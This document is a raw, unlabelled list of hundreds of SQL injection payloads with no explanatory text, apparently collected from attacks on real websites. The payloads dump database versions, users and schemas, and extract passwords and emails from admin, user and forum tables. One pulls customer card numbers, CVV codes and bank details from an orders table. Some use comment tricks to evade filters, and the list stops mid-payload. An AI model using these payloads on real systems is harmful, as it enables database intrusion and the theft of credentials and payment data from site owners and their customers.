1,concat(user(),0x3a,version(),0x3a,database(),0x3a,@@version_compile_os),3 -- -27 union select 1,concat(user(),0x3a,version()),3/* -27 union select 1,concat_ws(0x2a2a2a,email,password),3,4,5,6,7,concat_ws(0x2a2a,version(),user(),database()),9 from admin-- 27 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7-- -27 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9 -27 union select 1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 27 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7 -- 27' union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12 -- -27 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -27 union select 1,convert(version() using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -27 union select 1,group_concat(table_name),3,4 from information_schema.tables-- -27 union select 1,group_concat(uname,0x3a,upasswd),3,4,5 from users-- -27 UNION SELECT 1,name,pwd,4,5,6,7,8,9 FROM admin -27' union select 1,username,3,4,5,6 from user -- -27 union select 1,version(),user(),4,5-- -27 union select concat_ws(0x3a,database(),version(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -27 union select concat_ws(0x3a,login,pwd),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from usuarios limit 0,1-- -27 union select concat_ws( 0x3a,user(),version(),database()) 27 UNION SELECT concat_ws(0x3a,version(),user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/* -27 union select login,email,pwd,4,5,6,7,8,9,10,11,12,13,14 from users/* -27 union select login from users/* -27 union select @@version -27 UNION SELECT version(),2,database(),user(),@@version_compile_os/* 28036' and 1=0 union select 1,2,3,group_concat(table_name) from information_schema.tables Where table_schema=database() -- -28079 union select 1,2,concat(name,0x3a,pwd),4,5,6,7,8 from authors/* 28098097096550 union select 1,concat_ws(0x3a,version(),user(),database()),3-- 280986543150 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50-- -2809 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -280 union select 1,2,3,4,5,6,7,8,9,cast(concat_ws(0x3a,version(),database(),user()) as binary),11,12,13,14,15,16,17,18-- -280 union select 1,group_concat(0x3a,version(),database(),user()),3 /* 28147 UNION SELECT 0,1,2,3,concat_ws(0x0b,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 LIMIT 600,1 -- -2818 union select 1,2,3,4,concat(user,0x3a,password),6,7,8,9 from mysql.user/* -2818 union select 1,null,3,concat_ws(0x3a3a,username,user_password,user_passchg,user_email) from zenew_phpbb_users -- 281-999.9 union select 1,2,3,4,5,version(),7,8,9,10,11 -- -281 union select 1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15 from mysql.user/* -281 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6 -- -281 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -281 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 -- 2821 union select 1,2,'root',9,4,5,6,7,8,9,10-- 282222 union select concat(version(),0x3a3a,user(),0x3a3a,database()),2,3,4,5,6,7,8/* 2827 and 1=0 union select 1,version(),3 -- 282-999.9 union select 1,2,3,4,5,6,7,8,9,user(),version(),12,13,14,15,16,database(),18,19,20,21,22,23,24,25,26,27-- -282 and 1=2 union all select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11 -- 282 and 282=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x0),0x0),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from mysql.user/* 282 or (select 1 from msysaccessobjects group by mid((rnd(0)*2),1)) 282 union select 1,2,3,4,5,6,7,8,9,10,11,12-- 28333 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User(),0x3a,@@version_compile_os),0x71),0x71),3,4,5 LIMIT 1,1-- 2834' union select 1,2,3,4,5-- -283 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- 283 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version())-- 283 union select 1,2,3,admin,password,6,7,8,9,10,11,12,13,14,15 from admin -283 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9-- -283 union select 1,2,3,user(),version(),database(),7,8,9,10,11,12,13,14-- -283 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- -283 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6-- -283 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7 -283 union select concat_ws(0x3a,user(),database(),version()),2-- -28409 union select 1,2,3,4,5,6,concat_ws(0x3a,nick,hash,salt,email),8,9,10,11,12,13,14 from neway_users-- -2845 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -28464 union select 1,2,concat_ws(0x3a,username,password),4,5,6 from admins-- -2847 union select 1,2,3,4,group_concat(username,char(58),passwd),6,7,8,9,10,11,12,13,14 from bank_user 284-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -284 union select 1,2,0x3C7363726970743E616C657274282773716C27293C2F7363726970743E,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79/* -284 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10-- -284 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -284 union select 1,group_concat(0x3a,username,0x3a,hashed_password,0x3a,admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from staff_users -284 UNION SELECT concat(id,char(58),name,char(58),pass,char(58),email),2,3,4,5,6,7,8,9 from user limit 3000,1/* 2851 uNiOn SeLecT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15-- -2854' union select concat_ws(0x3a,database(),user(),version()),2,3-- 285' or 285=(select top 1 table_name from information_schema.tables where table_name not in ('auutiset_alueet','yritysrekisteri','auutiset_uutiset','www_area')) -- -285 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12/* -285 union select 1,version(),3,4,5,6,7-- 285 union select version(),2,3,4,5,6,7-- 285 union select version()::int,null,null,null,null,null,null from pg_user-- 2865143) union select 1,2,UNHEX(HEX(concat_ws(nickname,0x3a,realname,0x3a,password))),4,5,6,7,8,9,10,11 from users -- 2865143) union select 1,2,version(),4,5,6,7,8,9,10,11-- 2866 and 1=0 union select 1,table_name,3 from information_schema.tables -- -2867 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x0b,user(),database(),version()),17,18,19,20,21,22,23 -- 2869 union select null,null/* 286 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM users LIMIT 1,1 286 union select 1,2,3,4,5,6,7,8,9,10,11,12 from msysaccessobjects -286 union select 1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* -286 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14 -286 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15-- -286 union select 1,concat_ws(0x3a,username,password,status),3,4,5,6 from administrators limit 0,1/* -28748 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2F2A2A2F,Version(),Database(),User()),0x71),0x71),6,7,8,9,10/* 287687767869 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10-- -2877 union select 1,user(),database(),version(),5,6,7,8,9,0/* -287 union select 1,concat_ws(0x3a,version(),database(),user()),3,4-- -28801 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(user(),0x2a,database(),0x2a,version()),22,23 288821-999.9 union select 1,2,version(),4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 288 union select 1,2,3,4,5,6,CONCAT_WS(user(),version(),DATABASE()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 -- -288 union select 1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14 from ssrusers/* -288 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -288 union select 1,2,concat_ws(0x3a3a2020,version(),user(),database()),4/* -2893 union select concat_ws(0x3a3a,version(),user(),database()),2,3,4,5,6,7-- -289466' union select 1,USER(),VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/* -28997' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(table_name) from information_schema.tables group by table_schema limit 1,1 -- 289 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -289 union select 1,2,concat_ws(user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -289 union select 1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4,5/* -289' union select 1,group_concat(table_name,0x3a,table_schema),3,4,5,6,7,8 from information_schema.columns where column_name like '%25pas%25'-- 289 union select version()||chr(58)||current_user||chr(58)||current_database() # -- 28 and 1=0 union select 1,2,3,4,5,6,7,8-- 28 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,group_concat(email,char(58),password),48,49,50,51,52,53,54,55,56,57,58 from gs_users-- 28 and 1=0 UnIon selECt 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables-- 28 and substring((select y=1..3()),1,1)>x -28' union all select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10-- -28 UNION SELECT 0x73716C696E6A666C6431-- -28 union select 1,2,3,4,5,6,7,8,9,0-- -28 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -- -28 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21,22-- -28 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11 -- 28 ' UNION SELECT 1,2,3,4,5,6,concat_ws(0x1a,version(),user(),database()),8,9,10,11,12,13,14 -- -28 UNION SELECT 1,2,3,4,5,6,version()/* -28 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12-- -28 union select 1,2,3,4,convert(concat(name,0x3a,password,0x3a,email) using latin1),6,7 from user/* -28 union select 1,2,3,4,table_name from information_schema.tables -- -28 UNION SELECT 1,2,3,concat_ws(0x3a ,user(),database(),version()),5,6,7 from Member -28 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7 from users-- -28 union select 1,2,3,concat_ws(char(58,58),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- -28 Union select 1,2,3,group_concat(username,pwd) from users -- -28 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5 -- -28 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7 -28 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5 -- -28 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4/* -28 union select 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6 -28 union select-1,2,version(),4,5,6/* 28 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7,8,9 LIMIT 1,1-- -28 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,name,password,username),0x71),0x71),3,4,5,6,7,8,9 FROM jos_users LIMIT 0,1-- -28 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6-- -28 union select 1,concat(login,0x3a,password),3,4,5 from users limit 0,1/* -28 union select 1,concat(user(),char(58),version(),char(58),database()),3/* -28 union select 1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from phpbb_users limit 1,1-- -28 union select 1,concat_ws(0x3a3a,login,pass),3,4,5,6,7 from admins -- -28 union select 1,concat_Ws(0x3a,username,password),3,4,5,6,7 from user -- -28 union select 1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11 from mysql.user limit 0,1 -- -28 union select 1,concat_ws(0x3a,version(),database(),user()),3 -- -28 union select 1,concat_ws(0x3a,version(),database(),user()),3,4 28 UNION SELECT 1,CONCAT_WS(0x3a,Version(),Database(),User()),3,4 LIMIT 1,1-- -28 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6 -28 union select 1,password,3,4,5,6,7,8,9,10 from mysql.user/* -28 UnIon selECt 1,user(),3,4,5,6,7,8 -- -28/**//*!union*//**//*!select*//**/1,user(),3,4,5,6,7,8,9,10-- 28 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from admin/* -28 union select concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),2 from information_schema.columns limit 1/* 28' union select concat_ws(0x3a,password,email,username) from users limit 0,1/* -28 UNION SELECT user,password,3 FROM mysql.user/* 2902 and 1=0 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12 -- -290 union select 1,2,3,4,5,6,concat_ws(0x3a3a,id,uid,datum,count,user,stamp),8,9,10,11 from a_logins -- -290 union select 1,2,group_concat(table_name separator 0x0b),4,5,database(),7,8,9,10,11,12,13 from information_schema.tables where table_schema=0x73697465636d73-- 290 union select concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -2911 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/* -29145 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables-- 291 union select unhex(hex(version()))/* 292963 and 1=0 union select 1,2,3,4,group_concat(concat_ws(0x3a3a3a,password,pseudonyme) separator 0x0b),6,7,8,9,10,11 from membres WHERE pseudonyme='Hope' limit 0,20-- -292 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- -292 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),38 292 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,version(),user(),database()),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68/* -292 union select 1,2,3,4,5,6,column_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from information_schema.columns where table_name=0x57505f5553455253 -- -292 union select 1,2,3,4,5,6,column_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from information_schema.columns where table_name=0x57505f5553455253-- -2930 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,0x3a,password,0x3a,host),17,18 from mysql.user limit 1,1/* 293 and 1=0 union select 1,2,3,group_concat(schema_name),5,6 from information_schema.schemata-- -293 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),user(),database()),20,21,22,23/* -293 union select concat(version(),0x3a,database(),0x3a,user(),0x3a,@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 2946 and ascii(substring((user()),1,1))>=1/* -294 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -294 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 -294 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -294 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15/* -294 union select 1,2,(user_name,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from agora.phpbb_users-- -2953 union select 1,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME,0x3a),3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.COLUMNS limit 1 offset 210/* -2955 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- -295 union select 1,2,3,4 -- 295 union select 1,2,3,4,5,6,7,8,9,10 from msysaccessobjects -295 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 2965 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 limit 1,1/* -296 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),0x3a,user(),0x3a,database()),15,16,17,18,19/* -296 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19/* -296 union select 1,2,3,4,5,6,7,database(),9,10 from users /* -296 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),7,8,9,0,1,2/* 296 UNION SELECT 1,2,concat_ws(0x3A3a,user(),version(),database()),4,5,6,7/* -296 UNION SELECT 1,2,concat_ws(0x3a,name,activity,addr,phone,email,site,number),4,5,6 from shops-- -296 UNION SELECT 1,2,name,4,5,6 from srv14130_detki.shops-- -296 UNION SELECT 1,2,password,4,5,6,7,8,9,10,11,12,13,14 from users/* -297 union select 1,DATABASE()/* 298098760 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71)-- 298-56 union select 1,concat_ws(version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -2987 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ID,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110 from Users limit 0,1 -298 union select 1,2,concat(@i:=0x00,@o:=0x0d0a,benchmark(44,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),4,5,6,7,8,9,0,1,2,3,4-- -298 union select 1,2,concat_ws(0x3a3a,username,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from sbclassified_members -- -298 union select 1,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),3,4,5,6 -- -298 union select table_name,2 from information_schema.tables/* -2990 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,database(),version(),user()),11,12,13,14,15,16,17,18,19,20,21 -- -2990 union select 1,2,count(*),4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10 from information_schema.tables 2992) and 1=(select @@version)-- 2996 uniOn selEct concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7-- -2998 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13/* 299-999.9 union select 1,2,3,4-- 2-999.9 union select 1,2,3,4,5,6,version()-- 2-999.9 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)-- 2-999.9 union select 1,2,VERSION(),4-- 2-999.9 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14-- -2999 union select 1,2,3,4,5,6,concat_ws(0x3a,email,login),8,9,10,11,12,13,14 from login-- 2999 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13 FROM users LIMIT 1,1/* 299 or 1 group by concat((SELECT password from mos_users limit 0,1),rand(0)|0) having avg(0) -- -299 union select 1,2,3,4,5,database(),7,8,9,10,11,12 -- 299' union select 1,2,3,concat_ws(0x2f,version(),user(),database()),5,6 from information_schema.columns/* -299 union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 29 and 1=0 union select 1,2,group_concat(table_name separator 0x3c62723e),4,5,6,7 from information_schema.tables where table_schema=database() -- 29 and 1=0 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13-- 29' and 1=2 union select 1,2,3,group_concat(concat_ws(0x3a,userName,password)),5,6 from a_users -- 29 and 1=cast((SELECT current_user||chr(58)||current_database()||chr(58)||version()) as int)-- 29' and ascii(substring((SELECT table_name FROM information_schema.columns WHERE column_name=0x6c6f67696e),1,1))='112=p 29 and null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),29-- 29 union select 1,2,3,4,5,6,7,8,9,0,1,2,3 -- -29 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12 from admins -29 union select 1,2,3,4,5,6,7,8,9,password,11,user from mysql.user/* -29 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,username,user_password),0,1 from mognetforum.phpbb_users/* -29 union Select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,0,1,2 from cms_users -29 union select 1,2,3,4,5,6,concat_ws(0x3a3a,Id_admin,Nom,Prenom,Login,Password,Droits),8 from Admins -- -29 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,33-- -29 union select 1,2,3,4,5,6,email,8,9 from forum/* 29 UnIon selECt 1,2,3,4,5,version(),7,8-- -29 union select 1,2,3,4,concat(username,char(58),password),6,7 from admin -- -29 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10-- -29 union select 1,2,3,concat_ws(0x3a,orderId,nameF,nameL,address,city,state,zip,country,email,phone,paymentOption,cardType,cardNum,month,year,bankName,bankAddress,routing,account,checkNum,authSig,theTotal,status,timedate,timeShipped,comments,shipOpt,cardcvv2) from orders limit 2800,1-- -29 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12-- -29 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10/* -29 union select 1,2,3,concat_ws(user(),version(),database(),@@version_compile_os),5,6,7,8,9,10,11,12 29 union select 1,2,3,group_concat(admin,0x3a,admin_pass) from xp_sheets -- -29 union select 1,2,3,unhex(hex(username)),5,6,unh ex(hex(password)),8,9,10 from admin limit 0,1/* -29 union select 1,2,concat(user(),0x3a,version()),4,5,6,7,8/* 29' union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14/* -29 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6/* -29 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(login,0x3a,password,0x3a,id,0x3a,email),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13 from usuarios/* -29 union select 1,concat(username,char(58),password),3,4,5,6,7,8,9,10 from t_users/* -29 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11-- -29 union select 1,concat(version(),0x3a,user(),0x3a,database()),3 -- -29' union select 1,concat_ws(0x3A3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -29 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/* 29 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10 LIMIT 1,1-- -29 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8-- -29 union select 1,concat_ws(0x3,login,0x3,password,id),3,4,5,6,7,8,9,10,11,12,13,14,151,6,17,18,19,20 from users limit 1,1-- -29 union select 1,table_name,3,4,5 from information_schema.tables limit 10,100 /* -29 union select 1,table_name,version(),4,5,6,7,8,9,0,11 from information_schema.tables limit 1,1-- -29 union select 1,version(),3,4,5,6/* -29 union select concat(version(),0x20,database(),0x20,user()),2,3-- -29 union select concat_ws(0x3,version(),user(),database()),2,3,4/* -29 union select database(),version(),user(),4,5/* 29' union select unhex(hex(concat_ws(0x3a,login,password,email))),2 from gallery.authors where id=1 limit 1,1/* 29' union select user from mysql.user -- -29 union select user(),version(),database(),4-- -29 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- 2 and 0 union select 1,2,3-- 2 and 1=0 union SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 from user-- 2 and 1=0 union select 1,2,3,4,5,6,7,8,9,unhex(hex(version())),11-- 2 and 1=0 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9 2 aNd 1=0 UNION SELECT 1,2,3,4,version() -- 2 and 1=0 UNION SELECT 1,2,3,version() -- 2 and 1=0 UnIon selECt 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 -- 2/**/and/**/1=0/**//*!union*/ /*!select*/ 1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Password),1),1),4 from /*!baytnet_baytdb.member*/ 2 and 1=0 union select 